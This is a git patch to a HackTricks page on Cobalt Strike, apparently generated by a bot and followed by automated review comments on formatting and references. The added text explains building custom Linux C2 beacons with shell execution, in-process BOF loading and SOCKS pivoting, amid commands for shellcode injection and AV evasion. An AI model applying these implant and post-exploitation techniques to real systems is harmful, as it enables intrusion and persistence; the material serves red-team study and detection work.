From 1ce2fbdbcc393472f11baea1dda0997a910c5680 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 13 Feb 2026 02:07:05 +0000 Subject: [PATCH] Add content from: Cobalt Strike Linux Beacon --- src/windows-hardening/cobalt-strike.md | 35 +++++++++++++++++++++++--- 1 file changed, 31 insertions(+), 4 deletions(-) diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md index fa592f56d21..b9ba3ae03b9 100644 --- a/src/windows-hardening/cobalt-strike.md +++ b/src/windows-hardening/cobalt-strike.md @@ -38,7 +38,11 @@ If you already has the file you want to host in a web sever just go to `Attacks ### Beacon Options -
# Execute local .NET binary
+
+Beacon options and commands + +```bash +# Execute local .NET binary execute-assembly # Note that to load assemblies larger than 1MB, the 'tasks_max_size' property of the malleable profile needs to be modified. @@ -185,7 +189,18 @@ shinject x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 pro beacon> socks 1080 # SSH connection -beacon> ssh 10.10.17.12:22 username password
+beacon> ssh 10.10.17.12:22 username password +``` + + + +### Custom implants / Linux Beacons + +- A custom agent only needs to speak the Cobalt Strike Team Server HTTP/S protocol (default malleable C2 profile) to register/check-in and receive tasks. Implement the same URIs/headers/metadata crypto defined in the profile to reuse the Cobalt Strike UI for tasking and output. +- An Aggressor Script (e.g., `CustomBeacon.cna`) can wrap payload generation for the non-Windows beacon so operators can select the listener and produce ELF payloads directly from the GUI. +- Example Linux task handlers exposed to the Team Server: `sleep`, `cd`, `pwd`, `shell` (exec arbitrary commands), `ls`, `upload`, `download`, and `exit`. These map to task IDs expected by the Team Server and must be implemented server-side to return output in the proper format. +- BOF support on Linux can be added by loading Beacon Object Files in-process with [TrustedSec's ELFLoader](https://github.com/trustedsec/ELFLoader) (supports Outflank-style BOFs too), allowing modular post-exploitation to run inside the implant's context/privileges without spawning new processes. +- Embed a SOCKS handler in the custom beacon to keep pivoting parity with Windows Beacons: when the operator runs `socks ` the implant should open a local proxy to route operator tooling through the compromised Linux host into internal networks. ## Opsec 
@@ -196,7 +211,6 @@ The **`execute-assembly`** uses a **sacrificial process** using remote process i - [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly) - [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly) - In Cobalt Strike you can also use BOF (Beacon Object Files): [https://github.com/CCob/BOF.NET](https://github.com/CCob/BOF.NET) -- [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly) The agressor script `https://github.com/outflanknl/HelpColor` will create the `helpx` command in Cobalt Strike which will put colors in commands indicating if they are BOFs (green), if they are Frok&Run (yellow) and similar, or if they are ProcessExecution, injection or similar (red). Which helps to know which commands are more stealthy. @@ -292,7 +306,6 @@ Moreover, sometimes to do a pass-the.hash or pass-the-ticket attack it's stealth However, you need to be **careful with the generated traffic**, as you might be sending uncommon traffic (kerberos?) from your backdoor process. For this you could pivot to a browser process (although you could get caught injecting yourself into a process so think about a stealth way to do this). -```bash ### Avoiding AVs @@ -349,6 +362,9 @@ You could also check with functions are hooked with [**https://github.com/Mr-Un1 +
+Misc Cobalt Strike commands + ```bash cd C:\Tools\neo4j\bin neo4j.bat console @@ -371,5 +387,16 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . ``` +
+ +## References + +- [Cobalt Strike Linux Beacon (custom implant PoC)](https://github.com/EricEsquivel/CobaltStrike-Linux-Beacon) +- [TrustedSec ELFLoader & Linux BOFs](https://github.com/trustedsec/ELFLoader) +- [Outflank nix BOF template](https://github.com/outflanknl/nix_bof_template) +- [Unit42 analysis of Cobalt Strike metadata encryption](https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/) +- [SANS ISC diary on Cobalt Strike traffic](https://isc.sans.edu/diary/27968) +- [cs-decrypt-metadata-py](https://blog.didierstevens.com/2021/10/22/new-tool-cs-decrypt-metadata-py/) +- [SentinelOne CobaltStrikeParser](https://github.com/Sentinel-One/CobaltStrikeParser) {{#include ../banners/hacktricks-training.md}}
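Review bot: in the first hunk (`@@ -38,7 +38,11 @@`), the comment `# Execute local .NET binary` appears both as an unchanged context line and again as an added `+# Execute local .NET binary` line, so the resulting file would carry the comment twice unless the old copy was meant to be on the `-` line; check the removed line and drop one of the two. The new wrapper line before `Beacon options and commands` renders here as a bare `+`, so confirm the markup the wrapper uses actually survives the renderer and encloses the summary text, otherwise the label becomes a stray paragraph above the fence.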
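Review bot: in the `@@ -185,7 +189,18 @@` hunk, the last bullet of the new "Custom implants / Linux Beacons" section reads `socks ` with the port argument missing (compare `socks 1080` a few lines above in the same hunk); restore the argument. The third bullet says the task handlers "must be implemented server-side", but the surrounding text describes the implant receiving tasks and returning output to the Team Server, so "implant-side" (in the agent) is what is meant. The closing fence added after the `ssh` line pairs with the one opened in the first hunk some 150 lines earlier, so verify no headings or prose in between are now swallowed into one code block.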
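Review bot: in the `@@ -196,7 +211,6 @@` hunk, removing the duplicate `- [https://github.com/kyleavery/inject-assembly]` entry is correct. While touching this list, the two typos in the unchanged paragraph just below it, `agressor` and `Frok&Run`, could be fixed in the same commit.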
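Review bot: in the `@@ -292,7 +306,6 @@` hunk, dropping the orphaned ```` ```bash ```` opener before `### Avoiding AVs` is right, since it would have swallowed that heading into a code block; check that its former closing fence further down was not left behind, which would now open a block at the wrong place. The context line `pass-the.hash` should read `pass-the-hash`.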
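Review bot: in the `@@ -349,6 +362,9 @@` hunk, the summary label `Misc Cobalt Strike commands` does not describe the block it wraps, which starts with neo4j setup (`cd C:\Tools\neo4j\bin`, `neo4j.bat console`) rather than Cobalt Strike commands; label it for what the block actually contains. As in the first hunk, the wrapper line shows only as a bare `+`, so verify the markup.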
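Review bot: in the `@@ -371,5 +387,16 @@` hunk, the new References list adds four detection-oriented sources (the Unit42 metadata encryption analysis, the SANS ISC diary, cs-decrypt-metadata-py and CobaltStrikeParser) that nothing in the added "Custom implants / Linux Beacons" text cites or explains; either cite them inline where the metadata crypto and check-in traffic are mentioned (first bullet of that section) or add a sentence on what each is for, otherwise a reader cannot tell why they are listed. The closing wrapper line at the top of this hunk must pair with the opener added in the `@@ -349` hunk; confirm both render.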